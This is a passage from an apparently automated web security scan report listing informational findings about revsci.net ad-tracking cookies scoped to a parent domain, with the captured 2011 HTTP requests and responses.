LRLzLBTBUxAr3GLRtUEz"; rsi_segs_1000000=pUPFOMPC7nMQVv0bea5BqwmbRK+MVkRJAbeHbXhI9gQ4O3XY0n8gIQtYr8iWg2RZvh/nqedFjTikWJN1Ce1I20XZputsNYD8PRldhSQAgu3S781lzRP/7kn26cuKgM1KT5NUGEwNTM9smvMFtEf0ZLVTC0b7aBgzCg7Xur7v1rk70L8ih1N/YsuwCfoGn7sf5fgIfSAzMGQGLY+A6oofsCAXph2yry3ZEDY5O7XBeBJ7kKXTPQ==; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFec/C7nMQFlLKHV2YkRHDFZ6XU5/wAHYhBTtuzLxhsncWnsac5BtpDFUZr6/jfDVRBOK9JSmsXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kh6uj0O8yCeuP9QjUfquN0IT95gRWIOeIZ5VDzmd1TGncaIJy5Rmt72Y6sBk6eWHFT7d521/0QDr5cvwqaaeOq2sGW8QJkTmvIGA+gr1Jf7nK; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 01:14:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://segments.adap.tv/data/?p=audiencescience&type=gif&seg_id=&add=true
Content-Length: 0
Date: Sun, 04 Sep 2011 01:14:01 GMT


13.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=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; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_LVUM="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYNfmdo4272ogCIBDOimYv4fEg9zw6j4jrFvDEmjHCoJT8voGTLmJnWzvbs49kTDrTctUCdQ99o84r443+VA4/6HCW3/BRNAYl5aPcaD1s59ilv5lMNITjZH4Wthbsni1n3csqYpkQ4kjzeD9Ag7v0g8pQ43kHlf0zkVU4="; rsi_us_1000000="pUMd5c2g/xMQ7V5vYJPD0C371ly7qzCPyctfVMmoNfzhcSKV0v4e66ymwRf8QcU3FV+IGpm+3PedGzrOT9lT9EoUsFckBCjXgdMoWcJ+ZBwmTcmvYnaIAWGslXxRlOjyV0yAeH49RvV5wpBw+PAcIGEfuZuc4tqocczTORX1uqAjdGan1Zaz6sFHSHyFpNOFKP4PyXx28q95yfVkwA6b4qOX7Qc/kZO/twa3DHKJn5CXUk3ImbspngbAOY9OdE7rAkDDg5t1zwRApTn5BfEfw18PzHYXKtffbkxgQ0XCDWeN8jEgjJJzuv9+0n+IYqBjcIzZfohkqL9IJ8uYTYwtcmjZ+TxfgB7M4ZuMzhISw1WRpG2pk+vmwGRBalwrga+00ZPwjENAkddASB+BhUm04whwG893vWsR1EW2L7I5jNtUceNsv45LeKWq7ai/w/VEhZdtmHFBUtIprPiiLHiGV/zN2GoM2NFYcX+rvNVUAvwn9Myf9l5i3NSWCOLLAtUiglf9v3Vjb2IND7oIUGeYEBRF5SNUykPWjx86I+sRb2eVcjbmdzKfvPLHUwbMmTrpBft+K/R9YYwbnJeFrG9sMBOtPPcbM/kOqkWCZYdHTpMq5r0zjIc9/Ww6wp88lWDwK9Ig9wHsesg09/38LCdrLOpYfvQtW/b9cJ+KTbvbPE+upEdF+jnq8pFghFI13g2TX8KOxFCmrDyPP+K+WKhMydhjMeUBltkClF9H3/lk9/yMn+vX0MN0jgjYIA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOE/F7gMQlrWdI00GmV2emY3QHv3DVg9B02LswZhakqVFftDs8Pd8XH9p7LJOwoP+gn4nNPri7ZTBvzApv7OPHPbRT1bOas9RWPwMputF602mB2D/7kn26cvKk8znLSqrkUfWnvvP/lQ7FJEAIi/uZ65/PObD+9k+Oks/AIbF67IR+HUIyHvOjU5HxCf9/9FI4F5DDnZWHU17vK5Xoqw1LgsRAwEDgjYhNKRDbKw8H+dTTWvNOLItf3a3CQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:43:12 GMT

GIF89a.............!.......,...........D..;

13.53. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU/F7gMQlVNWye4WT+7FVcYUPosPyzLn7mCqBpJakqVFftDs8Pd8XH9p7LJOSgsdxA97zNjRBumoSHminWw7EeAr70CWFMXT8ZaoCiV1MiuKvp5QCBbboY8YnCOuCjLvt0/4MIf99AC7ZSY0w5C77Q6CoOArG5YEiepgrvMcmFjpSrPze/ZFTj8/JoWhtW9419+hEUht9d1eloKUu9z3BV+2PuPu; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:27 GMT
Content-Length: 384

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126'];
if(typeof(D
...[SNIP]...

13.54. http://pix04.revsci.net/F09828/a4/0/0/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzs01SB6Qb/nXlD7g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

13.55. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I07714/b3/0/3/1008211/954068462.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that most of the Set-Cookie headers in this response only clear stale rtc_* cookies (empty value, Expires in 1970); the cookies actually issued here are rsi_segs_1000000 and rtc_UUza, both with Domain=.revsci.net.

Request

GET /I07714/b3/0/3/1008211/954068462.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.google.com%252Ftrends%252Fhottrends%253Fq%253Dnotre%252Bdame%252Bfootball%2526date%253D2011-9-3%2526sa%253DX%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_Dp_w="MLtXrlEusS9roBD3MlioxsCF6sySUVfem3F3zgv5P2X5MNBz5u04Ie9ppXXLTNPCB8Rrdx21qWPBSMqTbO6HYwOXUoBWKm6QOeSxGzfdhIMqVpPipkbUdAcWiVJ3Cs4I2Yz+rbqR1Q7yacm6q3MhEYBqZRDVrlm4AttvllcDwygEvV4iEIdzZhutP2QInp8og4OZ+W7c9zRxnI1sZ/yaqTmrtGc5HBE/XipCAr9aBtIFqw2goGxwgKUjJ3So+TW+W8qspjGdsu4/t7OLlio5pcMR2nwhP2uILD3LHj7kAvztOgnn3xZhVKkQvKI+Vg=="; rsi_us_1000000="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"; rsi_segs_1000000=pUPFeknF7gMYF1JYvJuXopO09a420jnOKLfHaVwoHNgwnmKsDTMJ3YH2aKvvUGIZ/ovnvZQpXcibMPPd7DErWPCzXoGmdIFqM4kSkqVY4gx2tb55vuBU6xY7+voByvYres1JgvnVBK1tOVdIEKTEh5zeeSJ3c6azfwNbivbJs+KlZnQ2c6UCUEdoIjrmao/eYXYcDa0NTi8RdBX3aGM8/aQQvvQ=; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_96sc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_H9PS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ouyE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TPFo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JoIq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_V3Sj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Al2u=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KlBy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WxDm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8lxm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0xhU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_B35h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9v7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Dl2X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NNGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_T7TS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e1UB=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hoxY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CSVk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c-yi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_P-Tx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YMHi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YauM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_n6Bj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_10Pc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i0t6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0HN7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OOxT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CYvE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_P_wA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fqlT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-bS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gU3y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0M60=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4XRF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mKsM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D7_n=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xK1r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wv7Y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aMQ6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hCqO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_u2bt=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cDdJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_F9rS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cy72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tqOJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vkQg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dPEl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lQ5E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HP5F=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_afGD=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_99wg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Otdj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PS9L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_z5uu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LYEa=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_g7em=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bnh8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_j85P=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pGwN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zwtV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_11QG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lRqF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KNEl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yjL1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-YQM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IcRj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Ca17=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i8cQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I6ZG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spY_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OMEF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JxrH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wxnV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DeFS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DPB9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Eqv9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lnFX=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sT2D=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_miei=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hsco=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Cr86=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D9Sw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WIU4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qxGy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3y2w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4xbP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G1y2=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hwHO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_x2n2=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-Lvu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
